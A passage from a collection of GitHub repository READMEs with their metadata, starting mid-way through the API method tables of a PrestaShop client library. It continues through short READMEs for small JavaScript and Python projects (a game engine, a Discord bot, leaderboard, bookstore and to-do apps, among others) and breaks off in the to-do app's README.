| `get` | id, GetParams | Get a product supplier by id | | `create` | body, PostParams | Create a product supplier | | `update` | id, body, PutParams | Update a product supplier by id | | `delete` | id, DeleteParams | Delete a product supplier by id | #### products | Name | Parameters | Description | | :------- | :------------------ | :--------------------- | | `list` | ListParams | List all products | | `find` | ListParams | Find the first product | | `get` | id, GetParams | Get a product by id | | `create` | body, PostParams | Create a product | | `update` | id, body, PutParams | Update a product by id | | `delete` | id, DeleteParams | Delete a product by id | #### search | Name | Parameters | Description | | :----- | :---------------- | :-------------------------------- | | `list` | value, languageId | Search in products and categories | #### shopGroups | Name | Parameters | Description | | :------- | :------------------ | :------------------------ | | `list` | ListParams | List all shop groups | | `find` | ListParams | Find the first shop group | | `get` | id, GetParams | Get a shop group by id | | `create` | body, PostParams | Create a shop group | | `update` | id, body, PutParams | Update a shop group by id | | `delete` | id, DeleteParams | Delete a shop group by id | #### shopUrls | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all shop urls | | `find` | ListParams | Find the first shop url | | `get` | id, GetParams | Get a shop url by id | | `create` | body, PostParams | Create a shop url | | `update` | id, body, PutParams | Update a shop url by id | | `delete` | id, DeleteParams | Delete a shop url by id | #### shops | Name | Parameters | Description | | :------- | :------------------ | :------------------ | | `list` | ListParams | List all shops | | `find` | ListParams | Find the first shop | | `get` | id, GetParams | Get a shop by id | | `create` | body, PostParams | Create a shop | | `update` | id, body, PutParams | Update a shop by id | | `delete` | id, DeleteParams | Delete a shop by id | #### specificPriceRules | Name | Parameters | Description | | :------- | :------------------ | :--------------------------------- | | `list` | ListParams | List all specific price rules | | `find` | ListParams | Find the first specific price rule | | `get` | id, GetParams | Get a specific price rule by id | | `create` | body, PostParams | Create a specific price rule | | `update` | id, body, PutParams | Update a specific price rule by id | | `delete` | id, DeleteParams | Delete a specific price rule by id | #### specificPrices | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all specific prices | | `find` | ListParams | Find the first specific price | | `get` | id, GetParams | Get a specific price by id | | `create` | body, PostParams | Create a specific price | | `update` | id, body, PutParams | Update a specific price by id | | `delete` | id, DeleteParams | Delete a specific price by id | #### states | Name | Parameters | Description | | :------- | :------------------ | :------------------- | | `list` | ListParams | List all states | | `find` | ListParams | Find the first state | | `get` | id, GetParams | Get a state by id | | `create` | body, PostParams | Create a state | | `update` | id, body, PutParams | Update a state by id | | `delete` | id, DeleteParams | Delete a state by id | #### stockAvailables | Name | Parameters | Description | | :------- | :------------------ | :----------------------------- | | `list` | ListParams | List all stock availables | | `find` | ListParams | Find the first stock available | | `get` | id, GetParams | Get a stock available by id | | `create` | body, PostParams | Create a stock available | | `update` | id, body, PutParams | Update a stock available by id | | `delete` | id, DeleteParams | Delete a stock available by id | #### stockMovementReasons | Name | Parameters | Description | | :------- | :------------------ | :----------------------------------- | | `list` | ListParams | List all stock movement reasons | | `find` | ListParams | Find the first stock movement reason | | `get` | id, GetParams | Get a stock movement reason by id | | `create` | body, PostParams | Create a stock movement reason | | `update` | id, body, PutParams | Update a stock movement reason by id | | `delete` | id, DeleteParams | Delete a stock movement reason by id | #### stockMovements | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all stock movements | | `find` | ListParams | Find the first stock movement | | `get` | id, GetParams | Get a stock movement by id | | `create` | body, PostParams | Create a stock movement | | `update` | id, body, PutParams | Update a stock movement by id | | `delete` | id, DeleteParams | Delete a stock movement by id | #### stocks | Name | Parameters | Description | | :------- | :------------------ | :------------------- | | `list` | ListParams | List all stocks | | `find` | ListParams | Find the first stock | | `get` | id, GetParams | Get a stock by id | | `create` | body, PostParams | Create a stock | | `update` | id, body, PutParams | Update a stock by id | | `delete` | id, DeleteParams | Delete a stock by id | #### stores | Name | Parameters | Description | | :------- | :------------------ | :------------------- | | `list` | ListParams | List all stores | | `find` | ListParams | Find the first store | | `get` | id, GetParams | Get a store by id | | `create` | body, PostParams | Create a store | | `update` | id, body, PutParams | Update a store by id | | `delete` | id, DeleteParams | Delete a store by id | #### suppliers | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all suppliers | | `find` | ListParams | Find the first supplier | | `get` | id, GetParams | Get a supplier by id | | `create` | body, PostParams | Create a supplier | | `update` | id, body, PutParams | Update a supplier by id | | `delete` | id, DeleteParams | Delete a supplier by id | #### supplyOrderDetails | Name | Parameters | Description | | :------- | :------------------ | :--------------------------------- | | `list` | ListParams | List all supply order details | | `find` | ListParams | Find the first supply order detail | | `get` | id, GetParams | Get a supply order detail by id | | `create` | body, PostParams | Create a supply order detail | | `update` | id, body, PutParams | Update a supply order detail by id | | `delete` | id, DeleteParams | Delete a supply order detail by id | #### supplyOrderHistories | Name | Parameters | Description | | :------- | :------------------ | :---------------------------------- | | `list` | ListParams | List all supply order histories | | `find` | ListParams | Find the first supply order history | | `get` | id, GetParams | Get a supply order history by id | | `create` | body, PostParams | Create a supply order history | | `update` | id, body, PutParams | Update a supply order history by id | | `delete` | id, DeleteParams | Delete a supply order history by id | #### supplyOrderReceiptHistories | Name | Parameters | Description | | :------- | :------------------ | :------------------------------------------ | | `list` | ListParams | List all supply order receipt histories | | `find` | ListParams | Find the first supply order receipt history | | `get` | id, GetParams | Get a supply order receipt history by id | | `create` | body, PostParams | Create a supply order receipt | | `update` | id, body, PutParams | Update a supply order receipt by id | | `delete` | id, DeleteParams | Delete a supply order receipt by id | #### supplyOrderStates | Name | Parameters | Description | | :------- | :------------------ | :-------------------------------- | | `list` | ListParams | List all supply order states | | `find` | ListParams | Find the first supply order state | | `get` | id, GetParams | Get a supply order state by id | | `create` | body, PostParams | Create a supply order state | | `update` | id, body, PutParams | Update a supply order state by id | | `delete` | id, DeleteParams | Delete a supply order state by id | #### supplyOrders | Name | Parameters | Description | | :------- | :------------------ | :-------------------------- | | `list` | ListParams | List all supply orders | | `find` | ListParams | Find the first supply order | | `get` | id, GetParams | Get a supply order by id | | `create` | body, PostParams | Create a supply order | | `update` | id, body, PutParams | Update a supply order by id | | `delete` | id, DeleteParams | Delete a supply order by id | #### tags | Name | Parameters | Description | | :------- | :------------------ | :----------------- | | `list` | ListParams | List all tags | | `find` | ListParams | Find the first tag | | `get` | id, GetParams | Get a tag by id | | `create` | body, PostParams | Create a tag | | `update` | id, body, PutParams | Update a tag by id | | `delete` | id, DeleteParams | Delete a tag by id | #### taxRuleGroups | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all tax rule groups | | `find` | ListParams | Find the first tax rule group | | `get` | id, GetParams | Get a tax rule group by id | | `create` | body, PostParams | Create a tax rule group | | `update` | id, body, PutParams | Update a tax rule group by id | | `delete` | id, DeleteParams | Delete a tax rule group by id | #### taxRules | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all tax rules | | `find` | ListParams | Find the first tax rule | | `get` | id, GetParams | Get a tax rule by id | | `create` | body, PostParams | Create a tax rule | | `update` | id, body, PutParams | Update a tax rule by id | | `delete` | id, DeleteParams | Delete a tax rule by id | #### taxes | Name | Parameters | Description | | :------- | :------------------ | :----------------- | | `list` | ListParams | List all taxes | | `find` | ListParams | Find the first tax | | `get` | id, GetParams | Get a tax by id | | `create` | body, PostParams | Create a tax | | `update` | id, body, PutParams | Update a tax by id | | `delete` | id, DeleteParams | Delete a tax by id | #### translatedConfigurations | Name | Parameters | Description | | :------- | :------------------ | :-------------------------------------- | | `list` | ListParams | List all translated configurations | | `find` | ListParams | Find the first translated configuration | | `get` | id, GetParams | Get a translated configuration by id | | `create` | body, PostParams | Create a translated configuration | | `update` | id, body, PutParams | Update a translated configuration by id | | `delete` | id, DeleteParams | Delete a translated configuration by id | #### warehouseProductLocations | Name | Parameters | Description | | :------- | :------------------ | :---------------------------------------- | | `list` | ListParams | List all warehouse product locations | | `find` | ListParams | Find the first warehouse product location | | `get` | id, GetParams | Get a warehouse product location by id | | `create` | body, PostParams | Create a warehouse product location | | `update` | id, body, PutParams | Update a warehouse product location by id | | `delete` | id, DeleteParams | Delete a warehouse product location by id | #### warehouses | Name | Parameters | Description | | :------- | :------------------ | :----------------------- | | `list` | ListParams | List all warehouses | | `find` | ListParams | Find the first warehouse | | `get` | id, GetParams | Get a warehouse by id | | `create` | body, PostParams | Create a warehouse | | `update` | id, body, PutParams | Update a warehouse by id | | `delete` | id, DeleteParams | Delete a warehouse by id | #### weightRanges | Name | Parameters | Description | | :------- | :------------------ | :-------------------------- | | `list` | ListParams | List all weight ranges | | `find` | ListParams | Find the first weight range | | `get` | id, GetParams | Get a weight range by id | | `create` | body, PostParams | Create a weight range | | `update` | id, body, PutParams | Update a weight range by id | | `delete` | id, DeleteParams | Delete a weight range by id | #### zones | Name | Parameters | Description | | :------- | :------------------ | :------------------ | | `list` | ListParams | List all zones | | `find` | ListParams | Find the first zone | | `get` | id, GetParams | Get a zone by id | | `create` | body, PostParams | Create a zone | | `update` | id, body, PutParams | Update a zone by id | | `delete` | id, DeleteParams | Delete a zone by id | #### custom | Name | Parameters | Description | | :------- | :--------------------- | :------------------------------ | | `list` | CustomGetParams | List all on custom endpoint | | `get` | id, CustomGetParams | Get on custom endpoint by id | | `create` | body, CustomParams | Create on custom endpoint | | `update` | id, body, CustomParams | Update on custom endpoint by id | | `delete` | id, body, CustomParams | Delete on custom endpoint by id | ## Tests ```bash npm run test ```
Simplified and typed calls to Prestashop webservices.
typescript,api,node,prestashop,prestashop-api,javascript,js,ts
2023-04-27T14:09:21Z
2024-02-12T09:38:02Z
2024-02-12T09:38:02Z
1
89
268
1
2
8
null
MIT
TypeScript
ALapinskas/jsge
main
# JsGE@1.4.2 Javascript Game Engine This engine was designed to work with maps from Tiled editor. Advantages: * Fresh codebase, depends on latest javascript features such as classes and privacy. * OPP modular structure. * Webgl 1 under the hood. * Webgl [blend effects](https://developer.mozilla.org/en-US/docs/Web/API/WebGLRenderingContext/blendFunc). * Images and tiles animations. * Spine 2d skeletal animation. * Tiles and objects collisions. What you can do with it: 1. Draw primitives, texts, load images, audio and tilemaps with tilesets from [Tiled editor](https://www.mapeditor.org). 2. Render everything in a sequence. 3. Animate images, switching their frames. 4. Animate tiles. 5. Render tiles on top of each other using webgl blend effects. 6. Masks from primitives. 7. Map centering. Cutting off everything out off screen. 8. Extract boundaries(dot/ellipse/polygon) from tiles. 9. Custom boundaries(rect/polygon/circle) for image objects. 10. Collision detection. 11. Boundaries drawing as debug option. How to run examples: 1. npm i 2. npm start 3. visit localhost:9000 API docs and tutorials: [jsge.reslc.ru](https://jsge.reslc.ru) \ Files: [https://github.com/ALapinskas/jsge](https://github.com/ALapinskas/jsge)
Javascript Game Engine - 2d, top down game engine. Rendering primitives, images and datasets from Tiled Editor
2d-game-engine,engine,game-engine,javascript,top-down
2023-05-12T15:42:12Z
2024-05-09T08:09:36Z
2024-03-15T06:42:15Z
1
0
96
0
1
8
null
MIT
JavaScript
vaakian/monaco-ts
main
## Monaco Editor with `TypeScript` Acquisition Takes advantage of: - the `TypeScript` language service in the Monaco Editor - the `@typescript/ata` package to acquire the type definitions ## Try it Deployed on netlify: https://monaco-ts.netlify.app 1. hover the cursor on those variables above to see the types. 2. try to import any other library, the types will be automatically loaded. <img width="1326" alt="image" src="https://github.com/vaakian/monaco-ts/assets/30516060/7aac526f-7d58-485b-b80e-92921191a679">
Monaco-editor with automatic typescript acquisition.
javascript,monaco-code-editor,monaco-editor,type,typescript
2023-05-07T14:47:26Z
2023-08-11T18:02:46Z
null
1
0
9
0
1
8
null
null
TypeScript
Taka005/TakasumiBOTv2
main
[![Check](https://github.com/Taka005/TakasumiBOTv2/actions/workflows/check.yml/badge.svg?branch=dev)](https://github.com/Taka005/TakasumiBOTv2/actions/workflows/check.yml) [![License: GPL](https://img.shields.io/badge/License-GPL-yellow.svg)](https://opensource.org/licenses/GPL-3.0) [![Support](https://img.shields.io/discord/987698915820335124?color=5865f2&label=Discord&logo=Discord&logoColor=ffffff)](https://discord.gg/NEesRdGQwD) [![Email](https://img.shields.io/badge/email-takasumibot@gmail.com-blue.svg?style=flat)](mailto:takasumibot@gmail.com) # TakasumiBOT v2 - とても便利な万能BOTです - https://www.takasumibot.com/ - **このレポジトリはGPL-3.0ライセンスの元で公開されています** - **これを使って出来たコードは同じライセンスで公開する必要があるためご注意下さい** - **このプロジェクトに貢献したコードは全てTaka005に帰属します** # 貢献ガイド - **このプロジェクトに貢献したい場合は必ず以下に従ってください** - フォルダ構成は変更しない - **クソコード**は書かない - プルリクエストを送る前に"npm run lint"を実行する(BOTは起動させなくてよい) - 必ず**dev**ブランチにプルリクエストを送る - 必ず[開発ルール](https://github.com/Taka005/TakasumiBOTv2/tree/main#開発ルール)に従う # 開発・貢献者 - 開発: @taka005 - サポートサーバーにも是非参加してください - https://discord.gg/NEesRdGQwD # 開発ルール ## コードの記法 - モジュールのインポートの順は ビルトインモジュール > NPMパッケージ > 既存の関数やクラス > その他 ## コミットメッセージ - 種類:説明 ### 種類一覧 - feat 新機能 - fix 修正 - style コードの形の変更 - test テスト - build ビルドシステム等の変更 - change その他の変更 ## ブランチ戦略 - mainブランチには直接コミットしない
より便利になったDiscordの多機能BOT
discordbot,discordjs,javascript,nodejs,takasumibot
2023-04-28T07:11:28Z
2024-05-23T13:35:37Z
null
2
395
1,591
0
5
8
null
GPL-3.0
JavaScript
masiimc/crypto-website
main
# crypto-website a cryptto website using javascript and api ![Screenshot (36)](https://user-images.githubusercontent.com/116202175/234234697-ec9a1ab9-21af-4c64-9683-45de40b001c7.png) ![Screenshot (37)](https://user-images.githubusercontent.com/116202175/234234724-a5416131-8d08-44ea-a3f5-eec87c2db900.png) # Live Demo : https://www.linkedin.com/posts/masome-spring_javascript-webdesign-frontend-activity-7058743345065418752-BJ_L?utm_source=share&utm_medium=member_desktop
a currency website written by javascript and using api
api,axios,css,fetch,front-end,front-end-development,frontend,html,javascript,javascript-plugin
2023-04-25T09:12:27Z
2023-07-03T20:34:41Z
null
1
0
4
0
3
8
null
null
HTML
boratutumluer/airbnb-prediction-project
master
![map_cluster](https://github.com/boratutumluer/airbnb_prediction_project/assets/79102317/b17cdece-d219-4d20-a6f9-7da795a2cdad) ![map_predict](https://github.com/boratutumluer/airbnb_prediction_project/assets/79102317/0bc67631-4477-4051-98cc-e64ded9b577a) ![map_popup](https://github.com/boratutumluer/airbnb_prediction_project/assets/79102317/4f5ada00-cef3-40dc-b89f-3d7b5a9a584a)
:world_map: Istanbul Airbnb Price Prediction on Interactive Map
airbnb,airbnb-pricing-prediction,flask-application,javascript,mapbox,price-prediction,python
2023-05-08T21:26:53Z
2023-05-26T11:51:31Z
null
2
0
18
0
0
8
null
null
Python
codewitgabi/auctioneer
main
# Start Command ``` uvicorn core.asgi:application --reload ``` ## TODO * Add `paid` database column to lots to show it has been paid for. * Add API endpoint to mark lots as paid for when payment is completed. # Contributing To contribute to the project, follow the steps below - Fork the repository - Create a unique branch - Make changes and push - Create a pull request
A real time auctioning platform where users can auction lots and pay for them once an auction is over.
auction,auction-website,django,djangorestframework,javascript,postgresql,hacktoberfest,hacktoberfest2023
2023-05-15T15:53:14Z
2024-04-22T16:37:17Z
null
1
6
50
4
4
8
null
null
Python
musangamfure/LeaderBoard
development
# LeaderBoard <a name="readme-top"></a> <img width="854" alt="Learderboard" src="https://github.com/musangamfure/LeaderBoard/assets/123179856/ebea7070-652f-4290-b8d9-c04b13e074e4"> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [🚶‍♂️ Walkthrough](#walkthrough) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [📝 License](#license) <!-- PROJECT DESCRIPTION --> # 📖 [Leaderboard] <a name="about-project"></a> **[Leaderboard]** is a website that displays scores submitted by different players. It also allows you to submit your score. All data is preserved thanks to the external Leaderboard API service. ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> <details> <summary>HTML5</summary> <ul> <li><a href="https://html.com/">HTML5</a></li> </ul> </details> <details> <summary>CSS3</summary> <ul> <li><a href="https://www.css3.com/">CSS3</a></li> </ul> </details> <details> <summary>Javascript</summary> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript">Javascript</a></li> </ul> </details> <details> <summary>Webpack</summary> <ul> <li><a href="https://webpack.js.org/guides/getting-started/#basic-setup">Javascript</a></li> </ul> </details> <!-- Features --> ### Key Features <a name="key-features"></a> - User can add a score to a list of scores - Scores are rendered dynamically <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LIVE DEMO LINK --> ## 🚀 Live Demo <a name="live-demo"></a> - [Live Demo Link](https://musangamfure.github.io/LeaderBoard/dist/) <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> We will take you through the process. follow these steps. ### Prerequisites In order to get started, you be familiar with basic **git commands**. ### Setup Clone this repository to your desired folder. Example commands: ```sh cd my-folder git clone git@github.com:myaccount/my-project.git ``` <p align="right">(<a href="#readme-top">back to top</a>)</p> ### Install Install this project with: - Clone this Repo to your local machine and run in your preferred text editor(ex. Atom, VScode). ### Usage To open it in your preferred browser, run the command ```sh npm run dev ``` <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ## 👥 Authors <a name="authors"></a> 👤 **Emmanuel** - [GitHub](https://github.com/musangamfure) - [Twitter](https://twitter.com/musangamfure]) - [LinkedIn](https://www.linkedin.com/in/musangamfura-emmanuel-6a214a262/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FUTURE FEATURES --> ## 🔭 Future Features <a name="future-features"></a> - [ ] **[Consume the Leaderboard API using async and await]** - [ ] **[Refresh scores for a game created from the API]** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> If you like this project, follow me to see all my future projects or you can give a ⭐ <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a name="acknowledgements"></a> Kudos to Microverse for the opportunity to learn software development. <!-- LICENSE --> ## 📝 License <a name="license"></a> This project is [MIT](https://github.com/kessie2862/portfolio/blob/mobile/LICENSE.md) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
This is a JavaScript project for the Leaderboard list app for practicing the following: Use callbacks and promises, Learn how to use proper ES6 syntax, Use ES6 modules to write modular JavaScript, and Use webpack to bundle JavaScript
callback,es6,javascript,leaderboard,leaderboard-api,leaderboards,webpack
2023-05-16T13:22:23Z
2023-05-18T13:07:26Z
null
1
3
17
0
0
8
null
MIT
JavaScript
kessie2862/Leader-Board
development
# Leaderboard <a name="readme-top"></a> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [🚶‍♂️ Walkthrough](#walkthrough) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [📝 License](#license) <!-- PROJECT DESCRIPTION --> # 📖 [Leaderboard] <a name="about-project"></a> **[Leaderboard]** is a webpage that displays scores submitted by different players. It also allows you to submit your score. All data is preserved thanks to the external Leaderboard API service. ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> <details> <summary>HTML5</summary> <ul> <li><a href="https://html.com/">HTML5</a></li> </ul> </details> <details> <summary>CSS3</summary> <ul> <li><a href="https://www.css3.com/">CSS3</a></li> </ul> </details> <details> <summary>JavaScript</summary> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript">Javascript</a></li> </ul> </details> <details> <summary>Webpack</summary> <ul> <li><a href="https://webpack.js.org/guides/getting-started/#basic-setup">Javascript</a></li> </ul> </details> <!-- Features --> ### Key Features <a name="key-features"></a> - User can add a score to a list of scores - Scores are rendered dynamically <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LIVE DEMO LINK --> ## 🚀 Live Demo <a name="live-demo"></a> - [Live Demo Link](https://kessie2862.github.io/Leader-Board/dist/) <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> We will take you through the process. follow these steps. ### Prerequisites In order to get started, you be familiar with basic **git commands**. ### Setup Clone this repository to your desired folder. Example commands: ```sh cd my-folder git clone git@github.com:myaccount/my-project.git ``` <p align="right">(<a href="#readme-top">back to top</a>)</p> ### Install Install this project with: - Clone this Repo to your local machine and run in your preferred text editor(ex. Atom, VScode). ### Usage To open it in your preferred browser, run the command ```sh npm run dev ``` <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ## 👥 Authors <a name="authors"></a> 👤 **Prosper Kessie** - GitHub: [@kessie2862](https://github.com/kessie2862) - Twitter: [@Peekay_Codes](https://twitter.com/Peekay_Codes) - LinkedIn: [Prosper Kessie](https://www.linkedin.com/in/prosper-kessie-363968171/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FUTURE FEATURES --> ## 🔭 Future Features <a name="future-features"></a> - [ ] **[Consume the Leaderboard API using async and await]** - [ ] **[Refresh scores for a game created from the API]** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> If you like this project, follow me to see all my future projects or you can give a ⭐ <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a name="acknowledgements"></a> Kudos to Microverse for the opportunity to learn software development. <!-- LICENSE --> ## 📝 License <a name="license"></a> This project is [MIT](https://github.com/kessie2862/portfolio/blob/mobile/LICENSE.md) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
Leaderboard is a website that displays scores submitted by different players. It also allows a user to submit their score. All data is preserved thanks to the external Leaderboard API service.
javascript,webpack5
2023-05-15T10:17:47Z
2023-06-18T20:44:43Z
null
1
3
33
2
0
8
null
null
JavaScript
skabeo/bookstore
develop
<a id="readme-top"></a> <div align="center"> <!-- You are encouraged to replace this logo with your own! Otherwise you can also remove it. --> <br> <h1 style="font-size: 35px; color: lightblue"><b>Bookstore</b></h1> </div> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents <a id="table-of-contents"></a> - [� Table of Contents](#table-of-contents) - [📖 Bookstore Project ](#about-project) - [🛠 Built With ](#built-with) - [Tech Stack ](#tech-stack) - [Key Features ](#key-features) - [🚀 Live Demo ](#live-demo) - [💻 Getting Started ](#getting-started) - [Prerequisites](#prerequisites) - [Setup](#setup) - [Usage](#usage) - [Deployment](#deployment) - [👥 Authors ](#authors) - [🔭 Future Features ](#future-features) - [🤝 Contributing ](#contributing) - [⭐️ Show your support ](#️show-your-support) - [🙏 Acknowledgments ](#acknowledgements) - [❓ FAQ ](#faq) - [📝 License ](#license) <br> <!-- PROJECT DESCRIPTION --> # 📖 Bookstore <a id="about-project"></a> **Bookstore** is a simple webapp application that uses redux state management to manage the state of the application with react. Bookapp allows users to add a book to an API and in turn update the state of the book in redux and displays it in the UI. And also when a book is remove and action is dispatched to remove the specify book from the redux state and also sends a DELETE request to the API to remove the specific book. ## 🛠 Built With <a id="built-with"></a> ### Tech Stack <a id="tech-stack"></a> <details> <summary>Technology</summary> <ul> <li><a href="https://en.wikipedia.org/wiki/HTML">HTML</a></li> <li><a href="https://en.wikipedia.org/wiki/CSS">CSS</a></li> <li><a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript">Javascript</a></li> </ul> </details> <details> <summary>Tools</summary> <ul> <li><a href="https://code.visualstudio.com/">VSCode</a></li> <li><a href="https://git-scm.com/">Git</a></li> <li><a href="https://reactjs.org">React.js</a></li> </ul> </details> <br/> <!-- Features --> ### Key Features <a id="key-features"></a> - **Add a book to the library** - **Remove a book from the library** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LIVE DEMO --> ## 🚀 Live Demo <a id="live-demo"></a> - Live demo link is a available [here](https://skabeo-bookstore.onrender.com/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## 💻 Getting Started <a id="getting-started"></a> <br> ### Prerequisites In order to reproduce the Leaderboard and be able to make changes for your own purpose you need the following tools: - Visual Studio Code - <a href="https://git-scm.com/">git-scm</a> - A Github account - NodeJS (which also includes npm package manager) ### Setup 1. Make a new directory and go inside the directory using cd command in terminal 2. Use "git" to clone this repository into your local drive: >```$ git clone https://github.com/skabeo/bookstore``` 3. Run the command to install all necessary dependancies: >``` npm install ``` ### Usage - Feel free to experiment with the project. - To build the project: >``` npm run build ``` - The `index.html` file in `dist` folder is the output file that you want to open in the browser. - To add tests or examine different tests that are alreadt available go to: >``` [root_dir]/src/modules/[modulename].test.js ``` ### Deployment You can deploy this project by opening a new github repo and initialize the local git repo and connect it through: ```$ git remote add origin main [your github repo link]``` command. Then you can push the project into that repository and if you go to the repository in your account, you'll see the code in the account. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ## 👥 Author <a id="authors"></a> 👤 **Spencer Okyere** - GitHub: [@skabeo](https://github.com/skabeo) - Twitter: [@black_okyere](https://twitter.com/black_okyere) - LinkedIn: [LinkedIn](https://linkedin.com/in/okyere-spencer-9b602623b) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FUTURE FEATURES --> ## 🔭 Future Features <a id="future-features"></a> - A functional edit button where users can edit the book sent to the library. - Categories link to be filled with the appropriate UI. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a id="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](https://github.com/skabeo/bookstore/issues). <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- SUPPORT --> ## ⭐️ Show your support <a id="show-your-support"></a> If you like this project consider giving a star to the project and if you want to go furthur make a donation to any one the top 8 charities in Hawaii islands at the link below: - [Hawaii Donation](https://www.hawaii-guide.com/the-top-8-charities-you-should-donate-to-in-hawaii) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a id="acknowledgements"></a> I would like to thank Microverse online web development school for providing the material and guidance that helped me created this app. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FAQ (optional) --> ## ❓ FAQ <a id="faq"></a> - **Is mobile first web design a necessity these days?** - Since 2014 mobile web users have surpassed desktop users and the rate of the new users being introduced to web by mobile devices will only increase by time. - **Does the project support all platforms?** - Yes! Since it is based on web technology, any device that has a web browser will be able to see the website once it is online. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LICENSE --> ## 📝 License <a id="license"></a> This project is [MIT](https://github.com/skabeo/bookstore/blob/develop/LICENSE) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
Bookstore is a simple webapp application that uses redux state management to manage the state of the application with react. Bookapp allows users to add a book to an API and in turn update the state of the book in redux and in turn displaying it in the UI.
javascript,react,redux,sass
2023-05-04T09:28:46Z
2023-05-16T07:48:41Z
null
1
5
29
0
0
8
null
MIT
JavaScript
jicamargo/todo
main
<a name="readme-top"></a> <div align="center">   <br/>   <h1><b>TO DO LIST APP</b></h1>   <br/> </div> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents - [📗 Table of Contents](#-table-of-contents) - [📖 To Do List App ](#-to-do-list-app-) - [🛠 Built With ](#-built-with-) - [Tech Stack ](#tech-stack-) - [⭐️ Key Features ](#️-key-features-) - [🚀 Live Demo](#live-demo) - [💻 Getting Started ](#-getting-started-) - [Prerequisites](#prerequisites) - [Setup](#setup) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#deployment) - [👥 Authors ](#-authors-) - [🤝 Contributing ](#-contributing-) - [⭐️ Show your support ](#️-show-your-support-) - [🙏 Acknowledgments ](#-acknowledgments-) - [📝 License ](#-license-) - [This project is MIT licensed.](#this-project-is-mit-licensed) <!-- PROJECT DESCRIPTION --> # 📖 To Do List App <a name="about-project"></a> A simple yet powerful tool that helps you stay organized and productive. With this app You can easily create tasks, edit, complete, and track your progress. ## 🛠 Built With <a name="built-with"></a> - Webpack - HTML - CSS - Javascript ### Tech Stack <a name="tech-stack"></a> <details>   <summary>Client</summary>   <ul>     <li>HTML</li>     <li>JAVASCRIPT</li>     <li>CSS</li>     <li>WEBPACK</li>   </ul> </details> ## ⭐️ Key Features <a name="key-features"></a> - **Minimalistic layout** - **CRUD (create, read, update, delete) taks** - **Check tasks as completed** - **order your tasks by priority using drag and drop** - **Clear completed tasks** - **Preserve the information in your PC** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- DEMO LINK --> ## 🚀 Live Demo <a name="live-demo"></a> - [To do task lisk online demo](https://jicamargo.github.io/todo/dist/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> Open this site in your browser and enjoy. ### Prerequisites In order to run this project you need: A modern browser for like Mozilla, Chrome, Edge, etc. that supports HTML5 and CSS ### Setup This application runs directly (it does not need any setup process) ### Install Install this project with: This application runs directly (it does not need any install process) ### Usage Enter to index.html web page ### Run tests No tests needed, 